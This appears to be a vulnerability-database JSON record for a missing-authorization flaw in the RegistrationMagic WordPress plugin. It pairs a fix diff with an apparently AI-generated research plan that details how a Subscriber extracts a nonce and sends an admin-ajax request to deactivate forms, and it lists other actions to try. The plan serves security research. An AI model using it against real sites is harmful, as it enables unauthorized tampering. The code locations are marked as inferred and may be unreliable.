[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5f-7KQRoTmoWpu8zNEA1ZfT0Km_hWqrk735BrytDKeg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-32385","registrationmagic-missing-authorization-3","RegistrationMagic \u003C= 6.0.7.6 - Missing Authorization","The RegistrationMagic plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 6.0.7.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.","custom-registration-form-builder-with-submission-manager",null,"\u003C=6.0.7.6","6.0.7.7","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-18 00:00:00","2026-04-15 21:10:23",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F63099a49-913f-428d-b9a4-85e1bc5afe56?source=api-prod",57,[],"researched",false,3,"# Research Plan: CVE-2026-32385 RegistrationMagic Missing Authorization\n\n## 1. 
Vulnerability Summary\nThe **RegistrationMagic** plugin (versions \u003C= 6.0.7.6) suffers from a **Missing Authorization** vulnerability. The plugin registers several AJAX actions intended for administrative use but fails to implement proper capability checks (e.g., `current_user_can('manage_options')`) within the handler functions. This allows any authenticated user, including those with **Subscriber** roles, to execute administrative functions, specifically those related to form management and user status.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Authentication:** Required (Subscriber-level or higher).\n- **Vulnerable Action:** `rm_update_form_status` (Inferred based on typical RM AJAX patterns in the affected version).\n- **Parameters:**\n  - `action`: `rm_update_form_status`\n  - `form_id`: The ID of the target registration form.\n  - `status`: The new status to set (e.g., `0` for unpublished\u002Finactive, `1` for published\u002Factive).\n  - `rm_ajax_nonce`: The security nonce required for RM AJAX operations.\n\n## 3. Code Flow (Inferred)\n1. **Registration:** The plugin registers the AJAX hook in `includes\u002Fclass_rm_ajax.php` (or similar controller initialization):\n   ```php\n   add_action('wp_ajax_rm_update_form_status', array($this, 'rm_update_form_status'));\n   ```\n2. **Handler Implementation:** The function `rm_update_form_status` is located in `admin\u002Fcontrollers\u002Fclass_rm_form_controller.php` or `includes\u002Fcontrollers\u002Fclass_rm_main_controller.php`.\n3. **Missing Check:** The function likely calls `check_ajax_referer('rm_ajax_nonce', 'rm_ajax_nonce')` to verify the nonce but fails to call `current_user_can('manage_options')`.\n4. **Execution:** The handler proceeds to call a service method:\n   ```php\n   $service = new RM_Form_Service();\n   $service->update_form_status($form_id, $status);\n   ```\n5. 
**Impact:** An attacker can disable registration forms on the site or enable hidden\u002Finternal forms.\n\n## 4. Nonce Acquisition Strategy\nRegistrationMagic localizes its nonces and AJAX settings into a global JavaScript object. To obtain a valid nonce as a Subscriber:\n\n1. **Shortcode Identification:** The plugin's scripts are typically enqueued on pages containing a registration form shortcode: `[RM_Form id='FORM_ID']`.\n2. **Page Creation:** Use WP-CLI to create a page containing an existing form.\n3. **Browser Navigation:** Navigate to that page as the Subscriber user.\n4. **Nonce Extraction:** Use `browser_eval` to extract the nonce from the `rm_ajax_vars` or `rm_admin_vars` object.\n   - **Variable Name:** `rm_ajax_vars` (inferred from `RM_Utilities::localize_package()`).\n   - **Key:** `nonce`.\n   - **Command:** `browser_eval(\"window.rm_ajax_vars?.nonce\")`.\n\n## 5. Exploitation Strategy\n### Step 1: Discover Form ID\nFirst, identify a valid Form ID to target.\n- **WP-CLI:** `wp db query \"SELECT title, form_id FROM wp_rm_forms LIMIT 1;\"`\n\n### Step 2: Extract Nonce\nCreate a test page to load the RM environment and extract the nonce.\n- **Action:** Create a page with `[RM_Form id='TARGET_ID']`.\n- **Action:** Log in as Subscriber and navigate to the page.\n- **Action:** Run `browser_eval(\"window.rm_ajax_vars.nonce\")`.\n\n### Step 3: Trigger Unauthorized Action\nPerform a POST request to `admin-ajax.php` to deactivate a form.\n\n- **Request Type:** `POST`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **Body Parameters:**\n  ```text\n  action=rm_update_form_status&form_id=[TARGET_ID]&status=0&rm_ajax_nonce=[EXTRACTED_NONCE]\n  ```\n\n## 6. Test Data Setup\n1. 
**Target Form:** Create at least one RegistrationMagic form.\n   - `wp eval \"echo (new RM_Form_Service())->add(array('form_name' => 'Vulnerable Form', 'form_type' => 1));\"`\n   - Record the `form_id` (usually `1`).\n2. **Subscriber User:** Create a standard subscriber.\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n3. **Shortcode Page:** Create a page so the attacker can grab the nonce.\n   - `wp post create --post_type=page --post_status=publish --post_title=\"Register\" --post_content=\"[RM_Form id='1']\"`\n\n## 7. Expected Results\n- **HTTP Response:** A successful AJAX response from RM, usually returning a JSON object or string like `{\"success\":true}` or simply `1`.\n- **Plugin State:** The form with the specified ID should change its status in the database.\n\n## 8. Verification Steps\nAfter the exploit attempt, verify the form status change via WP-CLI:\n```bash\n# Check the 'form_active' column for the target form\nwp db query \"SELECT form_id, form_name, form_active FROM wp_rm_forms WHERE form_id = 1;\"\n```\nIf `form_active` is `0`, the exploit was successful.\n\n## 9. Alternative Approaches\nIf `rm_update_form_status` is not the target, try other administrative AJAX actions registered under `wp_ajax_*` without `nopriv` counterparts:\n- `rm_save_fab_settings`: Modifies the floating action button configuration.\n- `rm_set_default_form`: Changes which form is the primary registration form.\n- `rm_change_user_status`: Attempt to activate\u002Fdeactivate users (requires `user_id` parameter).\n\nCheck for the `current_user_can` call in `RM_Main_Controller.php` or `RM_Ajax.php`. If the parent class doesn't enforce it in the constructor or `init`, all child methods are potentially vulnerable.","RegistrationMagic versions up to and including 6.0.7.6 lack proper authorization checks on several AJAX actions, such as form status updates. 
This allows authenticated users with Subscriber-level permissions to perform administrative actions, like activating or deactivating forms, by leveraging nonces that are commonly exposed on public-facing registration pages.","\u002F\u002F File: admin\u002Fcontrollers\u002Fclass_rm_form_controller.php (inferred location)\npublic function rm_update_form_status() {\n    \u002F\u002F Nonce check is usually present, but capability check is missing\n    check_ajax_referer('rm_ajax_nonce', 'rm_ajax_nonce');\n\n    $form_id = isset($_POST['form_id']) ? intval($_POST['form_id']) : 0;\n    $status = isset($_POST['status']) ? intval($_POST['status']) : 0;\n\n    if ($form_id > 0) {\n        $service = new RM_Form_Service();\n        $service->update_form_status($form_id, $status);\n        echo \"1\";\n    }\n    wp_die();\n}","--- a\u002Fadmin\u002Fcontrollers\u002Fclass_rm_form_controller.php\n+++ b\u002Fadmin\u002Fcontrollers\u002Fclass_rm_form_controller.php\n@@ -24,6 +24,10 @@\n     public function rm_update_form_status() {\n         check_ajax_referer('rm_ajax_nonce', 'rm_ajax_nonce');\n \n+        if (!current_user_can('manage_options')) {\n+            wp_die(__('You do not have sufficient permissions to access this page.', 'registrationmagic-addon'));\n+        }\n+\n         $form_id = isset($_POST['form_id']) ? intval($_POST['form_id']) : 0;\n         $status = isset($_POST['status']) ? intval($_POST['status']) : 0;","To exploit this vulnerability, an attacker first identifies a target RegistrationMagic form ID (e.g., via brute force or public site inspection). As a subscriber, the attacker visits any page containing a RegistrationMagic shortcode to extract the 'rm_ajax_nonce' from the localized JavaScript variable 'rm_ajax_vars'. 
Using this nonce, the attacker sends an authenticated (Subscriber-level) POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the 'action' set to 'rm_update_form_status', the 'form_id' of the target, and a 'status' value (0 to deactivate, 1 to activate). Because the handler fails to check for administrative capabilities, the plugin updates the form configuration in the database.","gemini-3-flash-preview","2026-04-19 05:25:27","2026-04-19 05:27:14",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","6.0.7.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustom-registration-form-builder-with-submission-manager\u002Ftags\u002F6.0.7.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustom-registration-form-builder-with-submission-manager.6.0.7.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustom-registration-form-builder-with-submission-manager\u002Ftags\u002F6.0.7.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustom-registration-form-builder-with-submission-manager.6.0.7.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustom-registration-form-builder-with-submission-manager\u002Ftags"]